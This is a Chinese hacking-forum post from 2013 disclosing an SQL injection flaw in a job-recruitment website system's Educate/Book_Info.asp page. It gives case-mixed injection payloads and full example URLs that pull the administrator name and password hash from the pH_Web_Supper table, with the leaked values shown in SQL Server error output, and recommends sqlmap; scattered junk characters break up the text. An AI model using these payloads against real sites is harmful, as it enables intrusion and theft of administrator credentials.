找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2198|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp ; F# g: D# S3 b; B8 i
1 N% j! C$ Q1 q' K
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
2 }4 A4 d+ Y' S/ v" H; f  N
7 h6 |7 M7 o9 ~2 b9 r+ jexp:如下& p$ q) i1 ~) U! a) G" t# w; j  |
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& ?6 U: K# y3 R" Z查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 _' S7 I* F  J5 p
0 l9 v" }+ D6 D- j# M
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), {& M+ V$ z6 v$ Q0 p$ Y1 k! v0 e
! p: A) I9 z5 t1 U* J& M0 m1 _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'. e4 M: |% a' c3 g

, A1 j5 L( n: v) ^  J8 h将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。* b: F" Z( N% ^1 g( h# g

) Z' b5 ?0 N6 {: L& N/Educate/Book_Info.asp,行 8/ r5 s8 f: r6 ~, d3 v# j$ Z
( b2 e3 t3 Q9 M, O
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" q% Y% z* |* i  T* }
( w6 ], k8 x( Y' e# _- r8 }Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
  M2 U4 F- U7 R/ a  p% c) L ( v- r4 c# x/ E! Q
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 M* q) v, T* h. F# F+ t
( l* J, x2 ~! S& }
/Educate/Book_Info.asp,行 8
$ |4 B. H" |. C7 D' w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表